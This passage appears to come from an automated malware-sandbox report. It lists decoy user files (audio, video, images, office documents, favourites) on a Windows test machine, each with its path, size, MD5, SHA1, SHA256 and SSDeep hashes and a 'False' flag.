SHA256: ec82412e9878402aa52763f3376b2dc51be00aaac2ac5a2a8a88c3f55c6bb9ed
SSDeep: 1536:G0z/Ro9tvpGSR7vXoKuGTjSMUukh0ZqbZ2GiK96LuFWjkCRz3PZctN5B0EmvWSwE:G0z/Ro951R7v4NauFhcEHf9auQjkqw5m
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\qpbO.wav 70.35 KB MD5: 413a323a9a93ff127956843e2898a39f
SHA1: bb62c52c12b7823c0dcdc5596ddb1b2ef882046c
SHA256: ac78d01ba55128570259d1cb978ff3c1b331de96568d6bcfc0ae0a1f6f93647e
SSDeep: 1536:3wTB6pRdS+28CB1ldtd3/EQ/SZyw6VglgffX9uL/a/qz2Sh:E65F2RZtlHUU/9uu/uth
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\S4IWsPZvnadFRmzK.mp3 81.65 KB MD5: c2fddb041910213f36693023afbb9ecc
SHA1: b3e368e1c99a5f0569bdd3c7c2fabda6c1b21d93
SHA256: eaac7fe0591e019309f90e2782c7c3a51c7bd33436aeaa95e48ea00c82c44f9a
SSDeep: 1536:E/XXp3A9PPX3//t2hHFMpUSkb5h5TS1PHjrm62y5wXbLL891Ugb6yK5ACnBm6pw:EfZ+t4upUH/IHjrQhLfWpb6yLCBmqw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\SOIg.mp3 72.05 KB MD5: 35d850850a9f62a921f45cd1facb25bf
SHA1: 91492fb25c084d7a63d2c141d3d4c1055262c19c
SHA256: 5d926599d92be052d43b1ea91aa437fbdb028f302889d1f72921e536a0df15b0
SSDeep: 1536:T57DgLVReVcx/RMCSoaDDpBfAWTT7lS3H8PvLpG7MQVpl6JocMSFWM15tJUpzlFs:pD0DeKNRMKmRHs3H0LaMQh+xztJUpzU
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\SpwIY0qQ5DxtnlG-Nb.m4a 96.82 KB MD5: 30e36bac51b7e7f23e251a8479fe22db
SHA1: 2abac275b8d2a7676c29b75af2e3fb83ea24723e
SHA256: 9f684cfe39233d050e06efe07e82a3e05737f6edaa6d33327448c4e418a97edb
SSDeep: 1536:dOnyV/cpWrGJu+Wj+P98EIB6Zl+HpEDgQlNr1QhnNRrzxaIDxSs4:dOy1xrGJFWj+1QB6uklNr1OnnBrq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\unP_Med.m4a 58.31 KB MD5: 3796aa9c2df5b7539d92f71db25118e4
SHA1: 83940ff83acb981ae1b0bfe5f7127cc2c893af75
SHA256: cacb4758a568fd78c444385734bbebdcef4404d4f89f1da4e4a7f9433149121c
SSDeep: 1536:B4zJhytua4ZyirVw63z/7018O5LVaRaHoM0/4u:azJhCuUKwoE8KASoz/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\wcuQuzjX.wav 74.28 KB MD5: 58e8a74816292ebf8ec30bad2085170e
SHA1: 7dca164438e4bea9950d552c687b1c2f986d76b9
SHA256: f13a2f334af4c0e146f3a8882c9d34076e2faad1f560e252a8185902ccd2f0c3
SSDeep: 1536:I6TxtFEnE8L6S9sQliQauBPNECPTCnGR9FVVxbunPOz7ISa7zBfvQFO:I6TxtFEnJKoiQzPLPTjRBHuPXXhvwO
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\y9xtUA5iI6IPOKUD.wav 63.75 KB MD5: d773af13dd9f782dcc53936d18583c32
SHA1: 218f10935e29b52818ce123edfc4f328aae3b807
SHA256: 279499525a83ed10b02c5f50af41e7116e4fdd21a0e58a1d298437263bc98cf0
SSDeep: 1536:1Oadj6WTSKrSNhqLx6OgDe7+Wx6WbxK435CKjLSzGb:EadOMmOLx6OgDS+Wak5CKjLSS
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\Z3UK3vFO8h-zCs4j.mp3 82.35 KB MD5: 6ec9770e08e3bd420b4062accf0b2155
SHA1: 2e94037a50a3600116fffc802c79bc3ed2d79cca
SHA256: 84a33f8628e4c4235634e9b51073327ef3601d2b492c0693d3ca62ac6ca016ac
SSDeep: 1536:EI9UikF/F0xn59VzFKY7KcjxmpAfqPuf+kwSNSlhxm49CiGWon/:EI9zRHKYJjSAfqu1wASPgySn/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\zyzE7.m4a 81.11 KB MD5: f773ff0e1b827d209839b2a86ff0c171
SHA1: e766d908c178f169f8b146fa03abc9539dab95f7
SHA256: c0ba9b129c93ab4779ad9ad5a79882a72cc0745811a14688dacbee2f0978a800
SSDeep: 1536:2cbqrb9yLC/GA3/706ba7B6/i4+Wox0w0FuI1r5RhH/:2cZe/L/AWa96AWsd0Y+5Rh/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Music\_wiR1L3MR2ebfVeG.mp3 53.80 KB MD5: 5092e5b5fd5a3c1de7bdc70ceb5c804a
SHA1: 7d325b802b36678d17f18111e4ca6f1323d9af91
SHA256: 56e6f366326d7587884eeb83d9c474a75d093ec76ded9e6798c8b6c6b6919b7d
SSDeep: 768:PnocEMQQoCgposcK8J9zd655eDqva4HgHIgDPRfn1KIgFn4jlHiVKAhmkyy:PoPMQQapXA655gqv1HMIgFfUIvC8fy
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\3vMt_2q3fAah.png 86.49 KB MD5: 7f73224d73ee241b4d76e66658b8d1cd
SHA1: f72d33ef0b99398928340cc6c61ddeb5e29ddd45
SHA256: f6dd285675fa095e33a468440c5ff6894495f3260bd8c06f2f9c599d31a9b25f
SSDeep: 1536:TTu/dNTBCT0QK0eSglkiMb6CFm/G8WnzaESY1Zro0xdyVAxlI7H:/iCDgzLVESydtd7lI7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\CrjCu6i aZorUJcYh.png 51.81 KB MD5: d6c922d37692e9e0314516d78be91008
SHA1: f19e2aa0a8c7d2a6d204232f3a207443531fe70b
SHA256: 117e40a9f3188ccd26c5232486ba750be8ceb4396022af53c1d9931df0315ff3
SSDeep: 1536:VZaCwPpD6epvG9osTqsPURMhnI9prkoZyH:G7PTNG+cqseMIprkoZyH
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\IblMdY4N1yG.bmp 90.19 KB MD5: 8fda29c54bd5cc0d45545465afd38011
SHA1: e0879e7c22047a957c301f254e8990a9369f78ac
SHA256: ab490b4347702ea98fea0ae1e1fecc8587a85413786379727a00bd62a6a15a44
SSDeep: 1536:ctu/skYYt1AcbLeik0zrgu8RZHx3qgxdHRk+8+pEf4YszgZBDKC7a5DIjQgqbgn2:+2sgt1AKLeJ0zt8RZHAgnRk+8mfYszg4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\eFGyeqngF0yupS6aQiTk.mkv 67.82 KB MD5: 10552720eb3ba8dff9e6faf5721aec86
SHA1: b3f0e81aeecaa3ca3df6d0d4ed03a0a69bfe89aa
SHA256: 1db85c43009c7aff2248bbbbee5389e42265bfff4a449fd0715388c042260f21
SSDeep: 1536:U1VC9FQ0TXDGuhJRhg3QfkeYTHa/SuPMFv6ut25IgT6oCv:GCfTXDG6DyoYTHa/SCMs4rO8
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\HuEJMg3KiSp.avi 38.85 KB MD5: 5a572b438c8257d2dcf0e4ea0f9eefde
SHA1: fb22dd14be1fe1573b1a695ea1b3fbd6ba333e9a
SHA256: fab15d0498a66ba0e8d9d5a1e2daf8f97bf7fb2b1bae33634858ef3d4e9f1d1d
SSDeep: 768:U2/In7wfVQoDwGdB64l9sRHHfWIC+1nxTcKnVXA6qzU9vrilG4liV:g7wfVE22RU+1nDV5qIdilGJV
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\0JOcjFAlZN.flv 83.38 KB MD5: 2110a5539b60a9d732d9ee2368d29e50
SHA1: b187603b38014bcc44b53045ff7283d590dc59d9
SHA256: 5c7bedad10022d0c909c25a01339b5fed5c415244ec9b74c5778dd2315071038
SSDeep: 1536:8rnLYpYvRmEboKTY/A5YZXiAJVPhXbVfom+DGupnAsF6mg2+YL5cG5yRpvWhkCVf:8rqNEboVZXiAZ1Z+DznAsE2+Ydxyz6km
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\7H07rLnEi4jFThR2aq.mp4 1.50 KB MD5: a0524799e30397dfb7c35cb9eec34e09
SHA1: 6bd92117f0715930a43f68892b11730a5a1c6cff
SHA256: 2844b2fc00aa4a4374a153c5d2a2300fc54299d8383fa8fc1dea783cdd030992
SSDeep: 24:cAYY+fyPgGKpp+AFrGvvz0sfIzNeybr0FmqxWKIJNnKD5zC0/7K1vj1hKQrBWUFX:chYHg9X+A0zhwzAcqYNKD5esmt9rrVD
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Gtis3rDzqOHJLSemRMN.odp 21.60 KB MD5: fdcbbad7a60caf14a8f1bb807cdbb7ac
SHA1: e6eda0135925202d058e791426bd5b0f9b196fde
SHA256: c2069c981b500384c22e3afb099db764b3956be7acf7c63d5d88c7281760a6d0
SSDeep: 384:Y4lv2mnlB4E6Kb6LC+QQsH9vqWnL1dqmvogRDuxFujSSOtSOpT/f/H4Lw5i:Y4x2mnlSwKCzIWnL7JAgRDGFujS+YDIR
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\sKevCgi1Mzg9JDdGUMsM.flv 56.06 KB MD5: c2a0adaaaeaa545faa9ae966cf53a613
SHA1: 8e2c15381047c4722ff4d692fcc7a5f9f8cb629b
SHA256: a116b359ebc704347f5dcc73128ac4c9e3db3b84dc168f626a08e8794916e483
SSDeep: 1536:r11Ssf2+Hcr+o6swvuARJtOHUIJMtlOUcHBRYZWeG:rDS+2wc6DskRqHkcHB2ZU
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\0d9kggXW.pdf 36.12 KB MD5: 01390a497f954693a3d2eac94b5c52d5
SHA1: 392fe00b5e443a9735f427210a50f490cb8406b7
SHA256: 37c62e0d4d64c6d685e6f7b05a112abab0e085bd207c6b1d763f924b1b3f5c44
SSDeep: 768:A3TO+MIqFv+1bXgKbM8FkdWTUa9GycyNsG4y0C+8bRuto+H8PD:A3TfMIqM1bX1g8Fb9GyJflMto+H8r
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\aFuREbY291J9.rtf 62.46 KB MD5: 28c1166f91e5acf90e1ce4833a856309
SHA1: 898ea21e372f21f05ca3502c900678039c31bdd6
SHA256: 5dbc1573ed5d2df0271982a4f33ba14ca65d81afd760f6c97f78253791bcf606
SSDeep: 1536:pAL8RF6Me8c8oUTcHIpA9yhRxuq1gQfh1U6xeASwqXaVFtlPIaF2R:pAL8RRNxo/HgAwpusgQfhzxemqXavbTk
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\bhC_ABvBjR.ods 77.20 KB MD5: 4c0f324e5a9da806e9f36fbd3daec4c2
SHA1: a02c7e4937b698541e01751d2af11b87efafb2b9
SHA256: 8ee6059c843142459dc4dfa7001f9815b5baa821c7d0af00aab1429ef2a2f375
SSDeep: 1536:CVea2x7u7fyZNpzJ6ctiv354N9yxuBhkYkjNQMYMGYaWOkoXqDX+i4Lo:CVj7qf1JdiPqoxy1kjr1aW5qs
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\hK5LQd-AxtZKvzbn.xlsx 28.58 KB MD5: f3080711e797fa9c993ebedb27eca9a2
SHA1: bd4555d48d1edc9aee31a6e690695b937a5c7f04
SHA256: aee5972c7aad918da63e6e243df23be24cbd01883cd62086a3357be19353aade
SSDeep: 768:OkqB4IyRcKHJ0z17whWudpOipirXs3fLWw4G4X:NRcV57nkBpirc3fLWw4/
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\lbsR.csv 32.07 KB MD5: 48803b713c5b3e96b48dadda25467880
SHA1: 3deae71b79dc4adc66dab8987803c375a8d5fbf7
SHA256: fc9d6e47967b80ced0de35bc96d9f2cdac6bf3a30bd6e3bf22666fd4e5f86ac7
SSDeep: 768:Qk3bN5sKDGFSAd1KHEyGANy3C8Hkxn/hhoE++8ifE8azL:Qk3bBSFSSDDkxn/n++8Qgn
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\pelEM3i4e4Jx_4 Wkx.pdf 26.14 KB MD5: a6147813e53c6360431fd0fcdf68be41
SHA1: b1190c8a568fa7ac97113366a4fc7211f2665529
SHA256: b5a81a40c3d9619d5d01e0eef5fad625a1454df0e2feac8a0e1b07121a7bf1d3
SSDeep: 768:b2GYpjo7Xv19X5DsvB+GEKKN64xt3D4hBxSXO/stKFbR:aGYt2Xvb5wvB6KKjtTyBxSXO/fFN
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\Outlook Files\voeimd@djhreuu.uhd.pst 265.08 KB MD5: cff98993381af2a66a11a2c54b474d3a
SHA1: be66b5e87e976f5a9c349fdea3fdc17167b87230
SHA256: ee76e9556ca4bbc0ecd5d6485b9b8a2d6a32700dfd54a94ba2eeb3b9cd323b41
SSDeep: 3072:2Qy3R+PG4WaC+pdL+DSuifSsqhp65y6dDRphpycX4gHGpZvMkVWxXoOsUr:gkP8qSCqhp64ynyJS2NMkEtJsUr
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Suggested Sites.url 314 bytes MD5: ab7ddcc2bca7350586608cc3261f4036
SHA1: 98b04ce4bcdb35bf12a154e1689033d7da274cec
SHA256: 46d49718034c28357dfe334f3cbac37ff10905ab7f63613bdde171e5165a3e9c
SSDeep: 6:JH8/EvTNzL1B9ILOUhv0HbWAuTjgwrKxCnxhid+HBWUFcii96Z:5T9f9ZUp070HCQBWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Links\Web Slice Gallery.url 304 bytes MD5: cc836362edb1d3bb48e1e868251e7cb4
SHA1: 7ff69b9f92b3212bd5d17c72e335901155f84522
SHA256: c2b2e3c7a21879a7a94d344f73d8dbe15c3a334eb37bf1eae6ba5293f1225df7
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZADB5MM/0NmVHMbAoZElsUIaT0zt9HBWUFcii96Z:5T985QTDB5OEH8Uu7BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE Add-on site.url 211 bytes MD5: 44ddf471d93bbd22f8329867c590e7ef
SHA1: f98cda46547c298002207f0d68b7db1954f79d04
SHA256: bbf7263165a75979613d58af054ac82758f2c30885bffbea72cf2388300a7348
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAQKSHBWUFcii96Z:5T985QTH0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\IE site on Microsoft.com.url 211 bytes MD5: b4c2d0ff21a0170d5efa33853d4ccf53
SHA1: eb75b812144b378b413b5decce7aee382eded44c
SHA256: f1267a4b69806406e38b40e451d556c3d90904a67751bb8a94a097e1b0999f2b
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAKxKSHBWUFcii96Z:5T985QTKc0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Microsoft Websites\Microsoft At Work.url 211 bytes MD5: f34854cee5f76c493e4948926a620233
SHA1: 4af85d4bb85603e2035d962f58eb67f11dc24641
SHA256: 6fd9527738e3cf4dbfa6ae3a1a8f1e4b3a80e61f978ff1e23451d0e440dac136
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZArVyKSHBWUFcii96Z:5T985QTL0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSN Money.url 211 bytes MD5: eb6f94e96dbc817f7c4fd1fc6820667a
SHA1: 14ffca31ea9d9326b841d7e0e411dee6c4421e20
SHA256: 4bbc9a7c9043a203ecde35c0a2d3286ebad9464fe70401fe87f1d2688a040e52
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAx/xKSHBWUFcii96Z:5T985QTxE0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\MSN Websites\MSNBC News.url 211 bytes MD5: 753063c368f9616df5d078c2cb1d7484
SHA1: a7711a30b3ac77919edc0c80486de5d250afd59e
SHA256: 9a57ad0f95dd1fc00ae5cc25cca12c574744a244d972124091aa5ee91b065f11
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAxNCXKSHBWUFcii96Z:5T985QTxf0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Get Windows Live.url 211 bytes MD5: 09936bfdebaf106548ba692519d5d07b
SHA1: a0716cf5d8d32c37efffe2f9eef1fb09c1f6a581
SHA256: af057014df77f0c3750b01ed9ddaab9d2f5005f95ad00aad5e57eb0c8931ee27
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAGKSHBWUFcii96Z:5T985QTl0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Gallery.url 211 bytes MD5: 2e130da62e47513b4d91e300a4d64f79
SHA1: 8c5a7cb1f9148d10c45c2ef0768d187f869cf831
SHA256: 18a85f190212a294a4a03e231f6d221f399cbd934fe918e61f1ab3251826c261
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAtxKSHBWUFcii96Z:5T985QTtc0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Favorites\Windows Live\Windows Live Spaces.url 211 bytes MD5: 6c5651c5fa1ee2fa828f4c38814ffe37
SHA1: d7ebdbbd2b0e8398289c05fec014fa01e7f21722
SHA256: b665c1c523e5e6ed576bc76a4590414676345e826d14e529895c15699eca44de
SSDeep: 6:JH8/EvTNzL1ycfL0WYQuZAxx1FKSHBWUFcii96Z:5T985QTxx1A0BWUFcii9a
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\z2lk.jpg 52.43 KB MD5: 6dfba947b80c54fa514a84aeca46042a
SHA1: 2079376eb21fc5716045e228fba633308b88e17d
SHA256: eddc713b81b442ff8c3a12a3e31f5973521761ff0850f35f009bb74ab64870af
SSDeep: 1536:6LPgl7EX1Wadh+GW1VBGA6E17Lnb9VGcuOD0DKn0D:6LabaH+GW1HGA6EdTLGcWOn0D
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\P1zhXc0ibiHP0Bs2v5.gif 13.45 KB MD5: e1f9f0f583e550eaefbd75ea35ac1855
SHA1: 32ec3e822933b0892f6eac2ee4627e27c4f95a88
SHA256: e3adde70a75a3bdca722a0a37fd2c65c27c15ec9479574c24d4646e264f37a1e
SSDeep: 384:SEwSzUPtC866JuuRqEnDJL4kQXgUjEyEeTY:C1C866JuuRXnWgU4cTY
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\l6LO.bmp 40.46 KB MD5: 7fb2c497ef00b4fa46754172e74120ca
SHA1: 57d62fe9070d0943b4ac0fdcb08f812eac33aa1e
SHA256: 81a19962c9275aba7bd54e8d1632352130ff6bc4b6450fded763c7323ad5e298
SSDeep: 768:04M1HdU2+LK8Sh7vJVZAyBXkF7cPFfWySG9Qy4EEi4+l2DaTs:0d1HwLKB7hjAyBXScPFfWyZ4EEi4r7
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\MFSIcW7l5OKlh5.gif 60.48 KB MD5: 22bb2f5d1d43777e285be6d89057ff90
SHA1: 2bce63abf7322da8f8a3b5302035f685e62d96a3
SHA256: f02a1d575f910faf7ee0dd76cd9d6955a0afd86e79d4dac1fded65d24f6c483b
SSDeep: 1536:nmjoBHIZ0mO4GpnNL/3SJzgFYR2/CXwlJQW3:nmMByVyNL/3ShgCSCXwlJZ3
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\WQb DhJ7Wo.jpg 91.93 KB MD5: b8ec5050f8faef356a879fc235499c68
SHA1: b95e6957c4d001de5f24d6ca85c85978463986c8
SHA256: 14bfac4f97ebd94950b44ab3d5e85b82ce369320170af8532689f1440793c9ea
SSDeep: 1536:CUkhk+0IkHUqDoeEdSQzdeiQ5oJ0pTvhubkv4vjLeHbNTgBTANiYi5Qtr+poYL:ikrIknDoeEdSQzdk5E0pjhujjwpgiAYq
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\BoizzI4g97t.flv 67.73 KB MD5: 962ac3394ada275ab79ef7ba99b8820f
SHA1: 369ce9b666e13f603a8c84fa07ddadd1595508bf
SHA256: 36d07f619bafac359a2db344f8ca2f87f0c01de05706428f68ded0eb5a26efd2
SSDeep: 1536:+hlGkhFOdYEPwKBdMLPs/bgKN7tii8wCZVGLHZLLsntrrA:+hkuOOlKB4E/Z7tidVkLIntrA
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\Iq gbMO_n.flv 18.89 KB MD5: 46d6bfa75273dd2e188d965e16b5ff44
SHA1: afe51c9c915654dfbd2592824c6bf489ecf43b67
SHA256: f52e649dbb45354a8b46fa41558b02256040b241fce2bf372a8737d9ca088102
SSDeep: 384:BI2nATbfC7UpW4wcRD8MC15r9g3HYeM9iG8dod/sCsQYMFUAFnAIuFhuEoiXL:BI2gMUpWGRDRC15r9BriGtslQYc/8F80
False
C:\Users\5p5NrGJn0jS HALPmcxz\Videos\ynWwf7IE7\UtVdyOv5.swf 19.12 KB MD5: 3ac16b9c5a693da18f87266a01d09aa1
SHA1: 63ead171308f025928dbda5d56d2773e9333bd82
SHA256: f4981308b6a9d62e60504c27ed94bd88a61720283cc598e2c1e519493798f95d
SSDeep: 384:R+mKWc4i8mndC0f17VLtY1N6G22ar2D4j7mT:IIcdJnzd7HyE3r2XT
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\2BSi.ods 25.51 KB MD5: f538ce94948f0f6c2792584d19105d67
SHA1: e44bcc922180f3680b5526746c42766db5c96e79
SHA256: b970ed07b4f8fedc465b4db3e955a464d8f17af27935bba576ea16e2bc84997e
SSDeep: 768:zoIspS05l/qB1MqJWK5k4uyUWp5F8HDogwQ:zoIs4Gl/qsmWZ4zUWDY
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eOYyRR2EObYB.wav 4.54 KB MD5: b3c2fc3105e8f052de57bc567a02d1dc
SHA1: c35ea70eef99178acaa27257239e8700e91f1e09
SHA256: 769523deb7ca18cf2b68f45e7c93882a5daf7d6987ae6b290ed5b6a3d43c6544
SSDeep: 96:Z3YmyRcez/FPoS7CxdMG2+b8ye+1u9ICR4/u09hY/xKWrDMZgTfkxuvC4l:ZomyRj/BoSwdMG78/KMR+9G/guqkfpaG
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\eZfj5ZvjMOZ.m4a 71.41 KB MD5: 99c7e83576f1b27aa187005be5d95ee5
SHA1: b4255460999c846eab602fda5902b18afa04fec0
SHA256: f7571654a6de86717275128c795a68f43ab175a5875a9332d04b894de9b3a3a4
SSDeep: 1536:8BFI1SsmuFkE5aazIlQimr3gffx9pqZFSVk31KqDqKWKEVXlMZ+p7OXsCTB:8BcSsDB5a/mr3gXcfS+RD7GyJTB
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\O7mIpznG0.gif 83.23 KB MD5: eeb92d9d45ac1cbdc78a220c739acda0
SHA1: c80a2e9cba32281b7ef944993f7eab7af9d7e4dc
SHA256: 78b64eb3e76982ca0f6c181be1d533956c82590d4d8bcda9fac8832b3d9567cc
SSDeep: 1536:x7nKl3vFBYNE6NKPW7Zr++/fFUKVPeNvVNXqX3avKmxWCI8d0:RKlNqz+Ci+/fFUBpVNy69xQ82
False
C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\Mv1WVGRvzH\Fv3TELB 8E\qDPtFMhAiJ2xQ vm.odp 90.47 KB MD5: 227d6820438525982c96bf3ae9631aa0
SHA1: 381f408b6b87897134b185cc1cdbc3adf3e9dac4
SHA256: 23c982d009afbf9fe4ff843d21f0af74020734a6a0892f5ca57273a8df454fb1
SSDeep: 1536:yMe3O+Ae4ubDtI7Zc56oQeKC6E/2pWYI1chdS87dFcm272a3K0ttTay/YgmVuwUh:yMgMTuve7MrKAWyc28Tc2iT9+Vsh
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\1TiNgxSzmOsn7Ri OkP.ots 42.22 KB MD5: 6ca14b22503f2efef77a26b4d6cfa4ae
SHA1: 7df05a129790f4732ab134f3e7abf91d2c4f20c9
SHA256: 22b17ed98d4c033cf33716d306a4ed09e2e9641eb4c22bb891e390d7b37e7426
SSDeep: 768:izzrFMQhk/excDr1JvCY6RMAU0vMGXe6xifxe9XnL6FnWUmKPMTd8xkZ:izFYecLvP3iJFxifxHBPEL
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\gck8eKrR\-cJIpQCkg1\faBTC43kElpNlGMFau.pps 89.99 KB MD5: fa96f029c530f21c56d0255f90c60744
SHA1: d08d128399c6b990fbdd827073b82d8feaff99a9
SHA256: 4562882780a3e228fd4b9e203c3a8857cbdd6fa9608d7db68eb8954e13f14820
SSDeep: 1536:6MOax3EEX/yPFFww0vMnzjAlJZsazPRmTKR6uPeOnZ4kCNCAY6kVDvA:6glX/+0vEzjAzXR6TqZ4dTY6qA
False
C:\Users\5p5NrGJn0jS HALPmcxz\Documents\My Shapes\_private\folder.ico 29.30 KB MD5: 9970368b4f9e17803aa4867c505b2a91
SHA1: 8a0a1f2a0b5f4a8c1eaedea288401a3fe6f20b9a
SHA256: 266ad874ff5cf30d93da9b2da235c2ad6ae7f75e7e1b9de7178d7ceddc6dbd40
SSDeep: 768:EsXZcc1se85iG5T0p9oTS4WUmhndIS1w/oy+romaEACNOP:EsXr1svkmT0pL5dISooy+Um3ACg
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\CugNJ6pb94kQCPMiK.jpg 13.66 KB MD5: 4cceec2e7d1eb5cd36acc8bd5ed74c71
SHA1: 8c190c679607f9482fcd4cd08675912f7fb8c562
SHA256: e328384089c8445993721a726595990c9d35e5f8773d455a7ba79c8bac4ad438
SSDeep: 384:doM/QNyE5ASdW5GAQKLB012UsSzQ7qN4rQHGKYDR:tQ/A1xLB01kQ4rKGKYF
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\pySmPr79Heo.png 23.04 KB MD5: e0bce824a0d893b6db381f2ce422fb56
SHA1: 8bc863daa2728d68fdd059c310d61f13f24152e3
SHA256: 2d9d75138057caaa09ad9ee9d7a04a5a66bdbf90d941dd3ca8c8928a2e937d9c
SSDeep: 384:AV7w4B2a/mFYTaNUEqVvL2l94AZbiAlPztn62KJipRViOxxS6/DPA:OZ4040aNUrSlJzlrN67MXDSq4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\kuLBm0R5-grtJK8w\KkXM-cBNoii_tDa0YyP\Zusq yA8dO-j.gif 97.33 KB MD5: cbf84c56f7ce2e00d94d96a07ed8cf5e
SHA1: 6ead5619b6cd2b686b2bedea8d66481592f99217
SHA256: a1fc5af1df8725902b28e4785aa4ab6b29424ba877899f1d94085d2fae2fccc9
SSDeep: 3072:agRXnvjNYCw7C2oBwojCVPD33l+26gRlwvHw:hRXbNbvLCx426gRaw
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\KZrZHmvQBeSkBOCD.jpg 10.45 KB MD5: e1f0dc29d47ce59fac6a49872665047d
SHA1: 7910dd89027bf20420df50c8338f7014d404d894
SHA256: 5e6272469fca7f16d68e2ab1aef36370655c0450a5069e93ef4c57f707f3d921
SSDeep: 192:eY5HltN/qZzL9UT3bNwl5VvaR+YqAPJz15sQIYOaC2MuPhmYAwTXU:BRJ/qMTRe4ROoZHsQIY7C2MuPhB+
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\NYC5ngf\NSqsuqL\m7Zhy4P-VQ66.gif 65.75 KB MD5: 39875c304672a19ecdce6086f1c52638
SHA1: 381a1d160f26c3e0f3d74993b53301f25cb38509
SHA256: 84cd5d6979fac6bb435a1e7a6c62727426b608843389c5a5c337d3bca07d1cad
SSDeep: 1536:K+o7gb5DFioJjmMrTicznvuzUp+d62VuTpi6lMqnfAMr0gps:Zo7GCUdrzzv076a8VuqV1y
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\3Bsx2yMEE1UNteJQW\OQg8wwtsOsz4VSDTpD.png 73.73 KB MD5: 199b83eec418ad8832710ae05f01dd01
SHA1: 30b16ddf146f7a498dc150e3daf88980d46d7f8f
SHA256: 9670f8f0954291a987096207451080ece8f20dde85acb00fba37f51f9b9bde73
SSDeep: 1536:rdRZzMR8lcwTyAl3LniNTSq9hnlaX9ljrf25oGMHZju9AbK4+q7zcjHvMbBHjs:rdRZzMR8mg3ONT+NJ5jEAbz+6V4
False
C:\Users\5p5NrGJn0jS HALPmcxz\Pictures\ZTE-\bbyLspO02\y lRKLTJHdvF Q.gif 89.26 KB MD5: cc9aa524142f35105397b5d74039bc46
SHA1: 4662625cb83e4bcdbcb7a092767749e5c9928914
SHA256: 35f498f2492dd74429faa0efc92264c387e1034b709d95589db22f4c527bde89
SSDeep: 1536:yBC8/Cy35pVMNeEV7hCAS7AbLLqPZbN06qdY8q+oLhDKE98ECs1LqXh:U//Nb297szKSBbR8q+iGE/Cs1Lqx
False
